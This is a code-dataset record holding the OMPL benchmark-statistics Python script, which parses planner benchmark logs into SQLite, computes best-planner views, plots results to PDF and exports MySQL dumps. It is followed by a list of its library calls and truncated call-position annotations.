code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
|---|---|---|
#!/usr/bin/env python
######################################################################
# Software License Agreement (BSD License)
#
# Copyright (c) 2010, Rice University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the Rice University nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
######################################################################
# Author: <NAME>, <NAME>, <NAME>
from os.path import exists
import os
import sqlite3
import sys
from optparse import OptionParser
plottingEnabled = True
try:
import matplotlib
matplotlib.use('pdf')
from matplotlib import __version__ as matplotlibversion
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
import numpy as np
from math import floor
except ImportError:
print('Matplotlib or Numpy was not found; disabling plotting capabilities...')
plottingEnabled = False
# Given a text line, split it into tokens (by space) and return the token
# at the desired index. Additionally, test that some expected tokens exist.
# Return None if they do not.
def readLogValue(filevar, desired_token_index, expected_tokens):
start_pos = filevar.tell()
tokens = filevar.readline().split()
for token_index in expected_tokens:
if not tokens[token_index] == expected_tokens[token_index]:
# undo the read, if we failed to parse.
filevar.seek(start_pos)
return None
return tokens[desired_token_index]
def readOptionalLogValue(filevar, desired_token_index, expected_tokens={}):
return readLogValue(filevar, desired_token_index, expected_tokens)
def readRequiredLogValue(name, filevar, desired_token_index, expected_tokens={}):
result = readLogValue(filevar, desired_token_index, expected_tokens)
if result is None:
raise Exception("Unable to read " + name)
return result
def ensurePrefix(line, prefix):
if not line.startswith(prefix):
raise Exception("Expected prefix " + prefix + " was not found")
return line
def readOptionalMultilineValue(filevar):
start_pos = filevar.tell()
line = filevar.readline()
if not line.startswith("<<<|"):
filevar.seek(start_pos)
return None
value = ''
line = filevar.readline()
while not line.startswith('|>>>'):
value = value + line
line = filevar.readline()
if line is None:
raise Exception("Expected token |>>> missing")
return value
def readRequiredMultilineValue(filevar):
ensurePrefix(filevar.readline(), "<<<|")
value = ''
line = filevar.readline()
while not line.startswith('|>>>'):
value = value + line
line = filevar.readline()
if line is None:
raise Exception("Expected token |>>> missing")
return value
def readBenchmarkLog(dbname, filenames, moveitformat):
"""Parse benchmark log files and store the parsed data in a sqlite3 database."""
conn = sqlite3.connect(dbname)
if sys.version_info[0] < 3:
conn.text_factory = lambda x: unicode(x, 'utf-8', 'ignore')
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
# create all tables if they don't already exist
c.executescript("""CREATE TABLE IF NOT EXISTS experiments
(id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(512),
totaltime REAL, timelimit REAL, memorylimit REAL, runcount INTEGER,
version VARCHAR(128), hostname VARCHAR(1024), cpuinfo TEXT,
date DATETIME, seed INTEGER, setup TEXT);
CREATE TABLE IF NOT EXISTS plannerConfigs
(id INTEGER PRIMARY KEY AUTOINCREMENT,
name VARCHAR(512) NOT NULL, settings TEXT);
CREATE TABLE IF NOT EXISTS enums
(name VARCHAR(512), value INTEGER, description TEXT,
PRIMARY KEY (name, value));
CREATE TABLE IF NOT EXISTS runs
(id INTEGER PRIMARY KEY AUTOINCREMENT, experimentid INTEGER, plannerid INTEGER,
FOREIGN KEY (experimentid) REFERENCES experiments(id) ON DELETE CASCADE,
FOREIGN KEY (plannerid) REFERENCES plannerConfigs(id) ON DELETE CASCADE);
CREATE TABLE IF NOT EXISTS progress
(runid INTEGER, time REAL, PRIMARY KEY (runid, time),
FOREIGN KEY (runid) REFERENCES runs(id) ON DELETE CASCADE)""")
for filename in filenames:
print('Processing ' + filename)
logfile = open(filename, 'r')
start_pos = logfile.tell()
libname = readOptionalLogValue(logfile, 0, {1 : "version"})
if libname is None:
libname = "OMPL"
logfile.seek(start_pos)
version = readOptionalLogValue(logfile, -1, {1 : "version"})
if version is None:
# set the version number to make Planner Arena happy
version = "0.0.0"
version = ' '.join([libname, version])
expname = readRequiredLogValue("experiment name", logfile, -1, {0 : "Experiment"})
# optional experiment properties
nrexpprops = int(readOptionalLogValue(logfile, 0, \
{-2: "experiment", -1: "properties"}) or 0)
expprops = {}
for _ in range(nrexpprops):
entry = logfile.readline().strip().split('=')
nameAndType = entry[0].split(' ')
expprops[nameAndType[0]] = (entry[1], nameAndType[1])
# adding columns to experiments table
c.execute('PRAGMA table_info(experiments)')
columnNames = [col[1] for col in c.fetchall()]
for name in sorted(expprops.keys()):
# only add column if it doesn't exist
if name not in columnNames:
c.execute('ALTER TABLE experiments ADD %s %s' % (name, expprops[name][1]))
hostname = readRequiredLogValue("hostname", logfile, -1, {0 : "Running"})
date = ' '.join(ensurePrefix(logfile.readline(), "Starting").split()[2:])
if moveitformat:
expsetup = readRequiredLogValue("goal name", logfile, -1, {0: "Goal", 1: "name"})
cpuinfo = None
rseed = 0
timelimit = float(readRequiredLogValue("time limit", logfile, 0, \
{-3 : "seconds", -2 : "per", -1 : "run"}))
memorylimit = 0
else:
expsetup = readRequiredMultilineValue(logfile)
cpuinfo = readOptionalMultilineValue(logfile)
rseed = int(readRequiredLogValue("random seed", logfile, 0, \
{-2 : "random", -1 : "seed"}))
timelimit = float(readRequiredLogValue("time limit", logfile, 0, \
{-3 : "seconds", -2 : "per", -1 : "run"}))
memorylimit = float(readRequiredLogValue("memory limit", logfile, 0, \
{-3 : "MB", -2 : "per", -1 : "run"}))
nrrunsOrNone = readOptionalLogValue(logfile, 0, \
{-3 : "runs", -2 : "per", -1 : "planner"})
nrruns = -1
if nrrunsOrNone != None:
nrruns = int(nrrunsOrNone)
totaltime = float(readRequiredLogValue("total time", logfile, 0, \
{-3 : "collect", -2 : "the", -1 : "data"}))
numEnums = 0
numEnumsOrNone = readOptionalLogValue(logfile, 0, {-2 : "enum"})
if numEnumsOrNone != None:
numEnums = int(numEnumsOrNone)
for _ in range(numEnums):
enum = logfile.readline()[:-1].split('|')
c.execute('SELECT * FROM enums WHERE name IS "%s"' % enum[0])
if c.fetchone() is None:
for j in range(len(enum) - 1):
c.execute('INSERT INTO enums VALUES (?,?,?)', \
(enum[0], j, enum[j + 1]))
# Creating entry in experiments table
experimentEntries = [None, expname, totaltime, timelimit, memorylimit, nrruns, version,
hostname, cpuinfo, date, rseed, expsetup]
for name in sorted(expprops.keys()): # sort to ensure correct order
experimentEntries.append(expprops[name][0])
c.execute('INSERT INTO experiments VALUES (' + ','.join(
'?' for i in experimentEntries) + ')', experimentEntries)
experimentId = c.lastrowid
numPlanners = int(readRequiredLogValue("planner count", logfile, 0, {-1 : "planners"}))
for _ in range(numPlanners):
plannerName = logfile.readline()[:-1]
print('Parsing data for ' + plannerName)
# read common data for planner
numCommon = int(logfile.readline().split()[0])
settings = ''
for j in range(numCommon):
settings = settings + logfile.readline() + ';'
# find planner id
c.execute('SELECT id FROM plannerConfigs WHERE (name=? AND settings=?)', \
(plannerName, settings,))
p = c.fetchone()
if p is None:
c.execute('INSERT INTO plannerConfigs VALUES (?,?,?)', \
(None, plannerName, settings,))
plannerId = c.lastrowid
else:
plannerId = p[0]
# get current column names
c.execute('PRAGMA table_info(runs)')
columnNames = [col[1] for col in c.fetchall()]
# read properties and add columns as necessary
numProperties = int(logfile.readline().split()[0])
propertyNames = ['experimentid', 'plannerid']
for j in range(numProperties):
field = logfile.readline().split()
propertyType = field[-1]
propertyName = '_'.join(field[:-1])
if propertyName not in columnNames:
c.execute('ALTER TABLE runs ADD %s %s' % (propertyName, propertyType))
propertyNames.append(propertyName)
# read measurements
insertFmtStr = 'INSERT INTO runs (' + ','.join(propertyNames) + \
') VALUES (' + ','.join('?'*len(propertyNames)) + ')'
numRuns = int(logfile.readline().split()[0])
runIds = []
for j in range(numRuns):
values = tuple([experimentId, plannerId] + \
[None if not x or x == 'nan' or x == 'inf' else x \
for x in logfile.readline().split('; ')[:-1]])
c.execute(insertFmtStr, values)
# extract primary key of each run row so we can reference them
# in the planner progress data table if needed
runIds.append(c.lastrowid)
nextLine = logfile.readline().strip()
# read planner progress data if it's supplied
if nextLine != '.':
# get current column names
c.execute('PRAGMA table_info(progress)')
columnNames = [col[1] for col in c.fetchall()]
# read progress properties and add columns as necesary
numProgressProperties = int(nextLine.split()[0])
progressPropertyNames = ['runid']
for i in range(numProgressProperties):
field = logfile.readline().split()
progressPropertyType = field[-1]
progressPropertyName = "_".join(field[:-1])
if progressPropertyName not in columnNames:
c.execute('ALTER TABLE progress ADD %s %s' % \
(progressPropertyName, progressPropertyType))
progressPropertyNames.append(progressPropertyName)
# read progress measurements
insertFmtStr = 'INSERT INTO progress (' + \
','.join(progressPropertyNames) + ') VALUES (' + \
','.join('?'*len(progressPropertyNames)) + ')'
numRuns = int(logfile.readline().split()[0])
for j in range(numRuns):
dataSeries = logfile.readline().split(';')[:-1]
for dataSample in dataSeries:
values = tuple([runIds[j]] + \
[None if not x or x == 'nan' or x == 'inf' else x \
for x in dataSample.split(',')[:-1]])
try:
c.execute(insertFmtStr, values)
except sqlite3.IntegrityError:
print('Ignoring duplicate progress data. Consider increasing '
'ompl::tools::Benchmark::Request::timeBetweenUpdates.')
logfile.readline()
logfile.close()
conn.commit()
c.close()
def plotAttribute(cur, planners, attribute, typename):
"""Create a plot for a particular attribute. It will include data for
all planners that have data for this attribute."""
labels = []
measurements = []
nanCounts = []
if typename == 'ENUM':
cur.execute('SELECT description FROM enums where name IS "%s"' % attribute)
descriptions = [t[0] for t in cur.fetchall()]
numValues = len(descriptions)
for planner in planners:
cur.execute('SELECT %s FROM runs WHERE plannerid = %s AND %s IS NOT NULL' \
% (attribute, planner[0], attribute))
measurement = [t[0] for t in cur.fetchall() if t[0] != None]
if measurement:
cur.execute('SELECT count(*) FROM runs WHERE plannerid = %s AND %s IS NULL' \
% (planner[0], attribute))
nanCounts.append(cur.fetchone()[0])
labels.append(planner[1])
if typename == 'ENUM':
scale = 100. / len(measurement)
measurements.append([measurement.count(i)*scale for i in range(numValues)])
else:
measurements.append(measurement)
if not measurements:
print('Skipping "%s": no available measurements' % attribute)
return
plt.clf()
ax = plt.gca()
if typename == 'ENUM':
width = .5
measurements = np.transpose(np.vstack(measurements))
colsum = np.sum(measurements, axis=1)
rows = np.where(colsum != 0)[0]
heights = np.zeros((1, measurements.shape[1]))
ind = range(measurements.shape[1])
for i in rows:
plt.bar(ind, measurements[i], width, bottom=heights[0], \
color=matplotlib.cm.hot(int(floor(i * 256 / numValues))), \
label=descriptions[i])
heights = heights + measurements[i]
xtickNames = plt.xticks([x+width/2. for x in ind], labels, rotation=30)
ax.set_ylabel(attribute.replace('_', ' ') + ' (%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
props = matplotlib.font_manager.FontProperties()
props.set_size('small')
ax.legend(loc='center left', bbox_to_anchor=(1, 0.5), prop=props)
elif typename == 'BOOLEAN':
width = .5
measurementsPercentage = [sum(m) * 100. / len(m) for m in measurements]
ind = range(len(measurements))
plt.bar(ind, measurementsPercentage, width)
xtickNames = plt.xticks([x + width / 2. for x in ind], labels, rotation=30)
ax.set_ylabel(attribute.replace('_', ' ') + ' (%)')
else:
if int(matplotlibversion.split('.')[0]) < 1:
plt.boxplot(measurements, notch=0, sym='k+', vert=1, whis=1.5)
else:
plt.boxplot(measurements, notch=0, sym='k+', vert=1, whis=1.5, bootstrap=1000)
ax.set_ylabel(attribute.replace('_', ' '))
xtickNames = plt.setp(ax, xticklabels=labels)
plt.setp(xtickNames, rotation=25)
ax.set_xlabel('Motion planning algorithm')
ax.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
if max(nanCounts) > 0:
maxy = max([max(y) for y in measurements])
for i in range(len(labels)):
x = i + width / 2 if typename == 'BOOLEAN' else i + 1
ax.text(x, .95*maxy, str(nanCounts[i]), horizontalalignment='center', size='small')
plt.show()
def plotProgressAttribute(cur, planners, attribute):
"""Plot data for a single planner progress attribute. Will create an
average time-plot with error bars of the attribute over all runs for
each planner."""
import numpy.ma as ma
plt.clf()
ax = plt.gca()
ax.set_xlabel('time (s)')
ax.set_ylabel(attribute.replace('_', ' '))
plannerNames = []
for planner in planners:
cur.execute("""SELECT count(progress.%s) FROM progress INNER JOIN runs
ON progress.runid = runs.id AND runs.plannerid=%s
AND progress.%s IS NOT NULL""" \
% (attribute, planner[0], attribute))
if cur.fetchone()[0] > 0:
plannerNames.append(planner[1])
cur.execute("""SELECT DISTINCT progress.runid FROM progress INNER JOIN runs
WHERE progress.runid=runs.id AND runs.plannerid=?""", (planner[0],))
runids = [t[0] for t in cur.fetchall()]
timeTable = []
dataTable = []
for r in runids:
# Select data for given run
cur.execute('SELECT time, %s FROM progress WHERE runid = %s ORDER BY time' % \
(attribute, r))
(time, data) = zip(*(cur.fetchall()))
timeTable.append(time)
dataTable.append(data)
# It's conceivable that the sampling process may have
# generated more samples for one run than another; in this
# case, truncate all data series to length of shortest
# one.
fewestSamples = min(len(time[:]) for time in timeTable)
times = np.array(timeTable[0][:fewestSamples])
dataArrays = np.array([data[:fewestSamples] for data in dataTable])
filteredData = ma.masked_array(dataArrays, np.equal(dataArrays, None), dtype=float)
means = np.mean(filteredData, axis=0)
stddevs = np.std(filteredData, axis=0, ddof=1)
# plot average with error bars
plt.errorbar(times, means, yerr=2*stddevs, errorevery=max(1, len(times) // 20))
ax.legend(plannerNames)
if plannerNames:
plt.show()
else:
plt.clf()
def plotStatistics(dbname, fname):
"""Create a PDF file with box plots for all attributes."""
print("Generating plots...")
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
c.execute('SELECT id, name FROM plannerConfigs')
planners = [(t[0], t[1].replace('geometric_', '').replace('control_', '')) \
for t in c.fetchall()]
c.execute('PRAGMA table_info(runs)')
colInfo = c.fetchall()[3:]
pp = PdfPages(fname)
for col in colInfo:
if col[2] == 'BOOLEAN' or col[2] == 'ENUM' or \
col[2] == 'INTEGER' or col[2] == 'REAL':
plotAttribute(c, planners, col[1], col[2])
pp.savefig(plt.gcf())
c.execute('PRAGMA table_info(progress)')
colInfo = c.fetchall()[2:]
for col in colInfo:
plotProgressAttribute(c, planners, col[1])
pp.savefig(plt.gcf())
plt.clf()
pagey = 0.9
pagex = 0.06
c.execute("""SELECT id, name, timelimit, memorylimit FROM experiments""")
experiments = c.fetchall()
for experiment in experiments:
c.execute("""SELECT count(*) FROM runs WHERE runs.experimentid = %d
GROUP BY runs.plannerid""" % experiment[0])
numRuns = [run[0] for run in c.fetchall()]
numRuns = numRuns[0] if len(set(numRuns)) == 1 else ','.join(numRuns)
plt.figtext(pagex, pagey, 'Experiment "%s"' % experiment[1])
plt.figtext(pagex, pagey-0.05, 'Number of averaged runs: %d' % numRuns)
plt.figtext(pagex, pagey-0.10, "Time limit per run: %g seconds" % experiment[2])
plt.figtext(pagex, pagey-0.15, "Memory limit per run: %g MB" % experiment[3])
plt.show()
pp.savefig(plt.gcf())
pp.close()
def saveAsMysql(dbname, mysqldump):
# See http://stackoverflow.com/questions/1067060/perl-to-python
import re
print("Saving as MySQL dump file...")
conn = sqlite3.connect(dbname)
mysqldump = open(mysqldump, 'w')
# make sure all tables are dropped in an order that keepd foreign keys valid
c = conn.cursor()
c.execute("SELECT name FROM sqlite_master WHERE type='table'")
table_names = [str(t[0]) for t in c.fetchall()]
c.close()
last = ['experiments', 'planner_configs']
for table in table_names:
if table.startswith("sqlite"):
continue
if not table in last:
mysqldump.write("DROP TABLE IF EXISTS `%s`;\n" % table)
for table in last:
if table in table_names:
mysqldump.write("DROP TABLE IF EXISTS `%s`;\n" % table)
for line in conn.iterdump():
process = False
for nope in ('BEGIN TRANSACTION', 'COMMIT', \
'sqlite_sequence', 'CREATE UNIQUE INDEX', 'CREATE VIEW'):
if nope in line:
break
else:
process = True
if not process:
continue
line = re.sub(r"[\n\r\t ]+", " ", line)
m = re.search('CREATE TABLE ([a-zA-Z0-9_]*)(.*)', line)
if m:
name, sub = m.groups()
sub = sub.replace('"', '`')
line = '''CREATE TABLE IF NOT EXISTS %(name)s%(sub)s'''
line = line % dict(name=name, sub=sub)
# make sure we use an engine that supports foreign keys
line = line.rstrip("\n\t ;") + " ENGINE = InnoDB;\n"
else:
m = re.search('INSERT INTO "([a-zA-Z0-9_]*)"(.*)', line)
if m:
line = 'INSERT INTO %s%s\n' % m.groups()
line = line.replace('"', r'\"')
line = line.replace('"', "'")
line = re.sub(r"([^'])'t'(.)", "\\1THIS_IS_TRUE\\2", line)
line = line.replace('THIS_IS_TRUE', '1')
line = re.sub(r"([^'])'f'(.)", "\\1THIS_IS_FALSE\\2", line)
line = line.replace('THIS_IS_FALSE', '0')
line = line.replace('AUTOINCREMENT', 'AUTO_INCREMENT')
mysqldump.write(line)
mysqldump.close()
def computeViews(dbname, moveitformat):
conn = sqlite3.connect(dbname)
c = conn.cursor()
c.execute('PRAGMA FOREIGN_KEYS = ON')
c.execute('PRAGMA table_info(runs)')
if moveitformat:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
# kinodynamic paths cannot be simplified (or least not easily),
# so simplification_time may not exist as a database column
elif 'simplification_time' in [col[1] for col in c.fetchall()]:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, time + simplification_time AS total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
else:
s0 = """SELECT plannerid, plannerConfigs.name AS plannerName, experimentid, solved, time AS total_time
FROM plannerConfigs INNER JOIN experiments INNER JOIN runs
ON plannerConfigs.id=runs.plannerid AND experiments.id=runs.experimentid"""
s1 = """SELECT plannerid, plannerName, experimentid, AVG(solved) AS avg_solved, AVG(total_time) AS avg_total_time
FROM (%s) GROUP BY plannerid, experimentid""" % s0
s2 = """SELECT plannerid, experimentid, MIN(avg_solved) AS avg_solved, avg_total_time
FROM (%s) GROUP BY plannerName, experimentid ORDER BY avg_solved DESC, avg_total_time ASC""" % s1
c.execute('DROP VIEW IF EXISTS bestPlannerConfigsPerExperiment')
c.execute('CREATE VIEW IF NOT EXISTS bestPlannerConfigsPerExperiment AS %s' % s2)
s1 = """SELECT plannerid, plannerName, AVG(solved) AS avg_solved, AVG(total_time) AS avg_total_time
FROM (%s) GROUP BY plannerid""" % s0
s2 = """SELECT plannerid, MIN(avg_solved) AS avg_solved, avg_total_time
FROM (%s) GROUP BY plannerName ORDER BY avg_solved DESC, avg_total_time ASC""" % s1
c.execute('DROP VIEW IF EXISTS bestPlannerConfigs')
c.execute('CREATE VIEW IF NOT EXISTS bestPlannerConfigs AS %s' % s2)
conn.commit()
c.close()
if __name__ == "__main__":
usage = """%prog [options] [<benchmark.log> ...]"""
parser = OptionParser(usage)
parser.add_option("-d", "--database", dest="dbname", default="benchmark.db", \
help="Filename of benchmark database [default: %default]")
parser.add_option("-a", "--append", action="store_true", dest="append", default=False, \
help="Append data to database (as opposed to overwriting an existing database)")
parser.add_option("-v", "--view", action="store_true", dest="view", default=False, \
help="Compute the views for best planner configurations")
if plottingEnabled:
parser.add_option("-p", "--plot", dest="plot", default=None, \
help="Create a PDF of plots")
parser.add_option("-m", "--mysql", dest="mysqldb", default=None, \
help="Save SQLite3 database as a MySQL dump file")
parser.add_option("--moveit", action="store_true", dest="moveit", default=False, \
help="Log files are produced by MoveIt!")
(options, args) = parser.parse_args()
if not options.append and exists(options.dbname) and args:
os.remove(options.dbname)
if args:
readBenchmarkLog(options.dbname, args, options.moveit)
# If we update the database, we recompute the views as well
options.view = True
if options.view:
computeViews(options.dbname, options.moveit)
if plottingEnabled and options.plot:
plotStatistics(options.dbname, options.plot)
if options.mysqldb:
saveAsMysql(options.dbname, options.mysqldb)
|
[
"matplotlib.backends.backend_pdf.PdfPages",
"os.remove",
"numpy.sum",
"optparse.OptionParser",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.boxplot",
"matplotlib.pyplot.bar",
"numpy.mean",
"matplotlib.pyplot.gca",
"matplotlib.font_manager.FontProperties",
"numpy.std",
"os.path.exists",
"matplotlib.pyplot.setp",
"numpy.equal",
"matplotlib.pyplot.xticks",
"re.search",
"re.sub",
"matplotlib.pyplot.show",
"matplotlib.pyplot.figtext",
"matplotlib.use",
"sqlite3.connect",
"matplotlib.pyplot.gcf",
"matplotlib.__version__.split",
"numpy.vstack",
"numpy.zeros",
"math.floor",
"numpy.where",
"numpy.array"
] |
[((1977, 1998), 'matplotlib.use', 'matplotlib.use', (['"""pdf"""'], {}), "('pdf')\n", (1991, 1998), False, 'import matplotlib\n'), ((4389, 4412), 'sqlite3.connect', 'sqlite3.connect', (['dbname'], {}), '(dbname)\n', (4404, 4412), False, 'import sqlite3\n'), ((15219, 15228), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (15226, 15228), True, 'import matplotlib.pyplot as plt\n'), ((15238, 15247), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (15245, 15247), True, 'import matplotlib.pyplot as plt\n'), ((17369, 17379), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (17377, 17379), True, 'import matplotlib.pyplot as plt\n'), ((17625, 17634), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (17632, 17634), True, 'import matplotlib.pyplot as plt\n'), ((17644, 17653), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (17651, 17653), True, 'import matplotlib.pyplot as plt\n'), ((19726, 19749), 'sqlite3.connect', 'sqlite3.connect', (['dbname'], {}), '(dbname)\n', (19741, 19749), False, 'import sqlite3\n'), ((20061, 20076), 'matplotlib.backends.backend_pdf.PdfPages', 'PdfPages', (['fname'], {}), '(fname)\n', (20069, 20076), False, 'from matplotlib.backends.backend_pdf import PdfPages\n'), ((20484, 20493), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (20491, 20493), True, 'import matplotlib.pyplot as plt\n'), ((21263, 21273), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (21271, 21273), True, 'import matplotlib.pyplot as plt\n'), ((21488, 21511), 'sqlite3.connect', 'sqlite3.connect', (['dbname'], {}), '(dbname)\n', (21503, 21511), False, 'import sqlite3\n'), ((23570, 23593), 'sqlite3.connect', 'sqlite3.connect', (['dbname'], {}), '(dbname)\n', (23585, 23593), False, 'import sqlite3\n'), ((25859, 25878), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\n', (25871, 25878), False, 'from optparse import OptionParser\n'), ((15372, 15400), 'numpy.sum', 'np.sum', (['measurements'], {'axis': '(1)'}), '(measurements, axis=1)\n', (15378, 15400), True, 'import numpy as np\n'), ((15459, 15495), 'numpy.zeros', 'np.zeros', (['(1, measurements.shape[1])'], {}), '((1, measurements.shape[1]))\n', (15467, 15495), True, 'import numpy as np\n'), ((15816, 15881), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[(x + width / 2.0) for x in ind]', 'labels'], {'rotation': '(30)'}), '([(x + width / 2.0) for x in ind], labels, rotation=30)\n', (15826, 15881), True, 'import matplotlib.pyplot as plt\n'), ((16054, 16094), 'matplotlib.font_manager.FontProperties', 'matplotlib.font_manager.FontProperties', ([], {}), '()\n', (16092, 16094), False, 'import matplotlib\n'), ((19544, 19554), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (19552, 19554), True, 'import matplotlib.pyplot as plt\n'), ((19573, 19582), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (19580, 19582), True, 'import matplotlib.pyplot as plt\n'), ((20942, 21002), 'matplotlib.pyplot.figtext', 'plt.figtext', (['pagex', 'pagey', '(\'Experiment "%s"\' % experiment[1])'], {}), '(pagex, pagey, \'Experiment "%s"\' % experiment[1])\n', (20953, 21002), True, 'import matplotlib.pyplot as plt\n'), ((21011, 21084), 'matplotlib.pyplot.figtext', 'plt.figtext', (['pagex', '(pagey - 0.05)', "('Number of averaged runs: %d' % numRuns)"], {}), "(pagex, pagey - 0.05, 'Number of averaged runs: %d' % numRuns)\n", (21022, 21084), True, 'import matplotlib.pyplot as plt\n'), ((21091, 21176), 'matplotlib.pyplot.figtext', 'plt.figtext', (['pagex', '(pagey - 0.1)', "('Time limit per run: %g seconds' % experiment[2])"], {}), "(pagex, pagey - 0.1, 'Time limit per run: %g seconds' %\n experiment[2])\n", (21102, 21176), True, 'import matplotlib.pyplot as plt\n'), ((21180, 21259), 'matplotlib.pyplot.figtext', 'plt.figtext', (['pagex', '(pagey - 0.15)', "('Memory limit per run: %g MB' % experiment[3])"], {}), "(pagex, pagey - 0.15, 'Memory limit per run: %g MB' % experiment[3])\n", (21191, 21259), True, 'import matplotlib.pyplot as plt\n'), ((21289, 21298), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (21296, 21298), True, 'import matplotlib.pyplot as plt\n'), ((22478, 22512), 're.sub', 're.sub', (['"""[\\\\n\\\\r\\\\t ]+"""', '""" """', 'line'], {}), "('[\\\\n\\\\r\\\\t ]+', ' ', line)\n", (22484, 22512), False, 'import re\n'), ((22523, 22574), 're.search', 're.search', (['"""CREATE TABLE ([a-zA-Z0-9_]*)(.*)"""', 'line'], {}), "('CREATE TABLE ([a-zA-Z0-9_]*)(.*)', line)\n", (22532, 22574), False, 'import re\n'), ((23184, 23234), 're.sub', 're.sub', (['"""([^\'])\'t\'(.)"""', '"""\\\\1THIS_IS_TRUE\\\\2"""', 'line'], {}), '("([^\'])\'t\'(.)", \'\\\\1THIS_IS_TRUE\\\\2\', line)\n', (23190, 23234), False, 'import re\n'), ((23300, 23351), 're.sub', 're.sub', (['"""([^\'])\'f\'(.)"""', '"""\\\\1THIS_IS_FALSE\\\\2"""', 'line'], {}), '("([^\'])\'f\'(.)", \'\\\\1THIS_IS_FALSE\\\\2\', line)\n', (23306, 23351), False, 'import re\n'), ((26843, 26865), 'os.path.exists', 'exists', (['options.dbname'], {}), '(options.dbname)\n', (26849, 26865), False, 'from os.path import exists\n'), ((26884, 26909), 'os.remove', 'os.remove', (['options.dbname'], {}), '(options.dbname)\n', (26893, 26909), False, 'import os\n'), ((15330, 15353), 'numpy.vstack', 'np.vstack', (['measurements'], {}), '(measurements)\n', (15339, 15353), True, 'import numpy as np\n'), ((15416, 15437), 'numpy.where', 'np.where', (['(colsum != 0)'], {}), '(colsum != 0)\n', (15424, 15437), True, 'import numpy as np\n'), ((16379, 16422), 'matplotlib.pyplot.bar', 'plt.bar', (['ind', 'measurementsPercentage', 'width'], {}), '(ind, measurementsPercentage, width)\n', (16386, 16422), True, 'import matplotlib.pyplot as plt\n'), ((16444, 16509), 'matplotlib.pyplot.xticks', 'plt.xticks', (['[(x + width / 2.0) for x in ind]', 'labels'], {'rotation': '(30)'}), '([(x + width / 2.0) for x in ind], labels, rotation=30)\n', (16454, 16509), True, 'import matplotlib.pyplot as plt\n'), ((16882, 16914), 'matplotlib.pyplot.setp', 'plt.setp', (['ax'], {'xticklabels': 'labels'}), '(ax, xticklabels=labels)\n', (16890, 16914), True, 'import matplotlib.pyplot as plt\n'), ((16923, 16956), 'matplotlib.pyplot.setp', 'plt.setp', (['xtickNames'], {'rotation': '(25)'}), '(xtickNames, rotation=25)\n', (16931, 16956), True, 'import matplotlib.pyplot as plt\n'), ((19018, 19056), 'numpy.array', 'np.array', (['timeTable[0][:fewestSamples]'], {}), '(timeTable[0][:fewestSamples])\n', (19026, 19056), True, 'import numpy as np\n'), ((19082, 19136), 'numpy.array', 'np.array', (['[data[:fewestSamples] for data in dataTable]'], {}), '([data[:fewestSamples] for data in dataTable])\n', (19090, 19136), True, 'import numpy as np\n'), ((19254, 19283), 'numpy.mean', 'np.mean', (['filteredData'], {'axis': '(0)'}), '(filteredData, axis=0)\n', (19261, 19283), True, 'import numpy as np\n'), ((19306, 19342), 'numpy.std', 'np.std', (['filteredData'], {'axis': '(0)', 'ddof': '(1)'}), '(filteredData, axis=0, ddof=1)\n', (19312, 19342), True, 'import numpy as np\n'), ((20469, 20478), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (20476, 20478), True, 'import matplotlib.pyplot as plt\n'), ((22946, 22998), 're.search', 're.search', (['"""INSERT INTO "([a-zA-Z0-9_]*)"(.*)"""', 'line'], {}), '(\'INSERT INTO "([a-zA-Z0-9_]*)"(.*)\', line)\n', (22955, 22998), False, 